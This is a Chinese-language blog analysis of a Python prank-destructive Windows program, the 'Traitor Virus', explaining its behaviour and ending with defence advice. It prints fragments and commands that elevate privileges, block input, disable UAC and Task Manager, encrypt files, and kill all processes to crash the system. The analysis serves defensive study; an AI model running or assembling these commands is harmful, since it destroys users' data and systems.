恶意程序分析:东雪莲病毒(Traitor Virus)
项目地址:东雪莲病毒|罕见病毒|Traitor Virus(Github)
代码效果展示
一、代码概述
这是一款使用Python编写的恶意程序。在获取管理员权限后,会对计算机系统执行一系列破坏性操作,包括但不限于:
- 封锁用户输入
- 修改系统设置
- 自动下载程序
- 文件加密
- 禁用任务管理器
- 篡改系统图标
- 播放音视频文件
- 最终尝试杀死所有进程导致系统蓝屏崩溃
二、功能详细分析
1. 权限检测
def is_admin():try:return ctypes.windll.shell32.IsUserAnAdmin()except:return Falseif is_admin():# 恶意操作代码
else:if sys.version_info[0] == 3:ctypes.windll.shell32.ShellExecuteW(None, "runas", sys.executable, __file__, None, 1)
- 运作机制:通过系统API检测管理员权限,未获取权限时尝试请求提权
2. 信息提示与输入封锁
tkinter.messagebox.showinfo('骂谁罕见呢?', '现在退出还来得及')
user32 = windll.LoadLibrary("C:\\Windows\\System32\\user32.dll")
user32.BlockInput(True)
- 双重攻击:弹出迷惑性提示框后,立即锁定键盘鼠标输入
3. 系统设置篡改
▶ 禁用UAC功能
def close_uac():# 通过注册表修改以下键值:# ConsentPromptBehaviorAdmin=0# EnableLUA=0# PromptOnSecureDesktop=0
- 后果:关闭用户账户控制(UAC),为后续破坏扫清障碍
▶ 设置开机自启关机
def shuTdoWn():# 在启动目录创建shutdown.batbat_content = "shutdown -s -t 60"
- 效果:系统启动60秒后自动关机
▶ 自动下载原神
def GenShin_DownLoad():# 创建自动下载批处理脚本set downurl=https://ys-api.mihoyo.com/.../pc_default
- 资源消耗:利用系统启动项静默下载大体积游戏文件
4. 进程终结与系统破坏
def close_explorer():run('taskkill /F /IM explorer.exe')
- 立即影响:导致桌面/任务栏消失,系统界面崩溃
5. 弹窗与音频攻击
for i in range(15):t0 = threading.Thread(target=boom3) # 播放随机音频t1 = threading.Thread(target=boom2) # 创建弹窗
- 拒绝服务攻击:通过多线程制造大量弹窗和音频播放,耗尽系统资源
6. 文件加密系统
def encrypt_file(file_path):# 使用3DES加密算法# 修改文件扩展名为.hanjian
- 数据绑架:递归加密当前目录所有文件,密钥未妥善保存导致永久性数据丢失
7. 系统功能破坏
def disable_task_manager():# 注册表路径:HKEY_CURRENT_USER\...\System# 设置DisableTaskMgr=1
- 反制措施:禁用任务管理器阻止用户终止恶意进程
8. EXE图标篡改
def set_exe_icon():# 修改注册表HKEY_CLASSES_ROOT\exefile\DefaultIcon
- 视觉欺骗:将所有可执行文件图标替换为特定图案
9. 终极系统摧毁
if is_admin():os.system("Taskkill /fi \"pid ge 1\" /f")
- 致命操作:强制结束所有进程导致系统蓝屏崩溃
三、⚠️安全警告⚠️
-
谨慎运行程序
切勿随意执行来源不明的可执行文件,尤其警惕".bat"后缀脚本 -
权限最小化原则
日常使用避免使用管理员账户,对权限请求保持警惕 -
系统防护措施
- 保持Windows Defender实时保护开启
- 定期进行全盘扫描
- 及时安装系统安全更新
-
数据备份策略
采用3-2-1备份原则:至少3份副本,2种介质,1份异地存储 -
UAC保护机制
保持用户账户控制设置为默认级别,不要禁用安全提示
四、防御建议
- 企业环境部署EDR解决方案
- 个人用户安装火绒/卡巴斯基等安全软件
- 定期检查系统启动项(msconfig)
- 监控注册表关键路径变更
- 对重要文件实施加密备份
技术分析:网络小白_Uncle城 | 发布日期:2025-01-28
(注:本文仅作技术研究,严禁用于非法用途)
